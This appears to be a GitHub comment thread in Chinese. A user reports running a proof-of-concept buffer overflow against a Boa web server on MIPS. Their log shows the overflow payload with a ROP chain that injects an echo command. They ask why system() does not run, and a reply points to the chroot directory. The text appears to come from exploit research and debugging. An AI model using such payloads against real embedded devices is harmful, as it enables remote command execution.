Lerr1uqs
commented
1 year ago 我使用了你的poc
./bin/boa -p ./web -f ./etc/boa.conf
Message from syslogd@debian-mips at Sep 21 08:15:33 ... syslog: now chdir to .
Message from syslogd@debian-mips at Sep 21 08:15:33 ... syslog: now is:/
Message from syslogd@debian-mips at Sep 21 08:15:33 ... syslog: document root is:/ Starting Protocol Module: HTTP Server ... OK
translate_uri:222;Real UserAgent translate_uri:254 translate_uri:256 check password error,log_passwd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAw���w�7�AAAACCCCw���w��Pw�� echo 'hacked' > CrimeStatement;passwd=root❌0:0:root:/root:/bin/bash caught SIGSEGV, dumping core in /var/boa Abort
但是这样system函数并没有被成功执行,我的目录下没有产生对应文件。 奇怪的是如果我用gdbserver远程调试单步执行,我发现程序流是可以执行到system函数的。请问有什么解决办法嘛,难道要再rop中再调用一次sleep?可是我水平有限无法找到好的gadget。希望大佬救救
检查/web目录而不是你的活动目录,/web目录才是chroot的目录
SolitaryGrass
我使用了你的poc
./bin/boa -p ./web -f ./etc/boa.conf
Message from syslogd@debian-mips at Sep 21 08:15:33 ... syslog: now chdir to .
Message from syslogd@debian-mips at Sep 21 08:15:33 ... syslog: now is:/
Message from syslogd@debian-mips at Sep 21 08:15:33 ... syslog: document root is:/ Starting Protocol Module: HTTP Server ... OK
translate_uri:222;Real UserAgent translate_uri:254 translate_uri:256 check password error,log_passwd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAw���w�7�AAAACCCCw���w��Pw�� echo 'hacked' > CrimeStatement;passwd=root:x:0:0:root:/root:/bin/bash caught SIGSEGV, dumping core in /var/boa Abort
但是这样system函数并没有被成功执行,我的目录下没有产生对应文件。 奇怪的是如果我用gdbserver远程调试单步执行,我发现程序流是可以执行到system函数的。请问有什么解决办法嘛,难道要再rop中再调用一次sleep?可是我水平有限无法找到好的gadget。希望大佬救救